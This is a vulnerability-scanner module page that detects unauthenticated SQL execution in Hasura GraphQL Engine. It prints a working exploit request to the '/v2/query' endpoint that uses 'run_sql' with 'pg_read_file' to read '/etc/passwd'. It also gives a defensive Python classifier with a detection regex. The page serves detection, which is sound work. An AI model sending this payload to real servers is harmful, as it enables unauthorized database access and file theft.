
Hasura GraphQL Engine - Remote Code Execution

By kannthu

Critical
Vidoc Module
#graphql #edb #hasura #rce
Description

What is "Hasura GraphQL Engine - Remote Code Execution"?

The "Hasura GraphQL Engine - Remote Code Execution" module is designed to detect a vulnerability in the Hasura GraphQL Engine software. This vulnerability allows remote unauthenticated users to execute arbitrary SQL statements through the "/v2/query" endpoint, which can lead to remote code execution. The severity of this vulnerability is classified as critical, with a CVSS score of 10. The module was authored by Udyz.

Impact

If exploited, this vulnerability can have severe consequences. Attackers can execute arbitrary SQL statements, potentially gaining unauthorized access to sensitive data, modifying the database, or compromising the entire system. It is crucial to address this vulnerability promptly to prevent any potential damage.

How does the module work?

The module sends an HTTP POST request to the "/v2/query" endpoint of the Hasura GraphQL Engine. The request payload includes a SQL statement that attempts to read the contents of the "/etc/passwd" file. The module then applies a matching condition that checks whether the response body matches the regular expression "root:.*:0:0:". If this condition is met, the SQL statement was executed successfully and the vulnerability is present.

Example HTTP request:

POST /v2/query HTTP/1.1
Host: {%Hostname%}
Content-Type: application/json

{
  "type": "bulk",
  "source": "default",
  "args": [
    {
      "type": "run_sql",
      "args": {
        "source": "default",
        "sql": "SELECT pg_read_file('/etc/passwd',0,100000);",
        "cascade": false,
        "read_only": false
      }
    }
  ]
}

The module's matching condition checks whether the response body matches the regular expression "root:.*:0:0:", which is the shape of the root user's line in "/etc/passwd". A match indicates that the SQL statement read the file, confirming that the endpoint accepts unauthenticated SQL execution.
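The following is an added example written for this page from a defender's standpoint, not code from Vidoc or the Hasura project. It classifies constructed request/response records of the kind the module produces: a POST to "/v2/query" carrying a "run_sql" action (possibly nested in a "bulk" action) with no admin secret or Authorization header is flagged as suspicious, and it is reported as confirmed when the response also satisfies the module's "root:.*:0:0:" matcher. The record format and the header names Hasura honours for authentication are assumptions.

```python
import json
import re

QUERY_PATH = "/v2/query"
# Response matcher used by the module: the root entry of /etc/passwd.
PASSWD_MARKER = re.compile(r"root:.*:0:0:")
# Assumption: these are the request headers a Hasura deployment uses for admin/auth.
AUTH_HEADERS = {"x-hasura-admin-secret", "authorization"}


def contains_run_sql(node) -> bool:
    """True if the query object, or any member of a nested 'bulk' action, is run_sql."""
    if isinstance(node, list):
        return any(contains_run_sql(item) for item in node)
    if not isinstance(node, dict):
        return False
    return node.get("type") == "run_sql" or contains_run_sql(node.get("args"))


def response_indicates_exposure(body: str) -> bool:
    """Apply the module's regex to a response body."""
    return PASSWD_MARKER.search(body) is not None


def classify(event: dict) -> str:
    """Return 'confirmed', 'suspicious' or 'ok' for one request/response record."""
    if event["method"] != "POST" or event["path"] != QUERY_PATH:
        return "ok"
    try:
        doc = json.loads(event["body"])
    except json.JSONDecodeError:
        return "ok"
    if not contains_run_sql(doc):
        return "ok"
    if any(name.lower() in AUTH_HEADERS for name in event["headers"]):
        return "ok"  # run_sql with admin credentials is normal administrative use
    if response_indicates_exposure(event.get("response", "")):
        return "confirmed"
    return "suspicious"


def scan(events) -> list:
    return [classify(e) for e in events]


# Constructed sample records (not real traffic): the page's request with a matching
# response, an authenticated run_sql, and an ordinary GraphQL query.
SAMPLE_EVENTS = [
    {"method": "POST", "path": "/v2/query", "headers": {"Content-Type": "application/json"},
     "body": json.dumps({"type": "bulk", "source": "default", "args": [{"type": "run_sql", "args": {
         "source": "default", "sql": "SELECT pg_read_file('/etc/passwd',0,100000);",
         "cascade": False, "read_only": False}}]}),
     "response": '{"result_type":"TuplesOk","result":[["pg_read_file"],["root:x:0:0:root:/root:/bin/bash"]]}'},
    {"method": "POST", "path": "/v2/query", "headers": {"X-Hasura-Admin-Secret": "<redacted>"},
     "body": json.dumps({"type": "run_sql", "args": {"sql": "SELECT 1"}}), "response": "{}"},
    {"method": "POST", "path": "/v1/graphql", "headers": {}, "body": '{"query":"{ users { id } }"}', "response": "{}"},
]
```

Running `scan(SAMPLE_EVENTS)` over the constructed records yields one confirmed finding for the first record and nothing for the other two.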

For more information, refer to the official documentation.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
regex: root:.*:0:0:
Passive global matcher
No matching conditions.
On match action
Report vulnerability